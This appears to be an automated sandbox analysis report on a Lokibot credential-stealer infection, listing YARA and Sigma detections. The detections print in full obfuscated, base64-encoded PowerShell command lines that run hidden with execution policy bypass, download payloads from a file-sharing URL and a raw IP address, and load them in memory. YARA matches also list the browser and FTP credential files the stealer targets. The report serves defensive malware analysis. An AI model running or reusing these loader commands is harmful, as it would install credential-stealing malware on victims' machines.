13.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
13.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.aspnet_compiler.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
13.2.aspnet_compiler.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
13.2.aspnet_compiler.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
13.2.aspnet_compiler.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
13.2.aspnet_compiler.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
9.2.powershell.exe.6a69e98.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.2.powershell.exe.6a69e98.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.powershell.exe.6a69e98.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.powershell.exe.6a69e98.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
9.2.powershell.exe.6a69e98.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
9.2.powershell.exe.6a69e98.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
9.2.powershell.exe.6a69e98.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.2.powershell.exe.6a69e98.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 24 entries

Other

Source	Rule	Description	Author	Strings
amsi32_5820.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2Rpbmdd

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS" , ProcessId: 7068, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Source: Process started

Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2Rpbmdd

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))", CommandLine: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICA

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT, CommandLine|base64offset|contains: E, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgI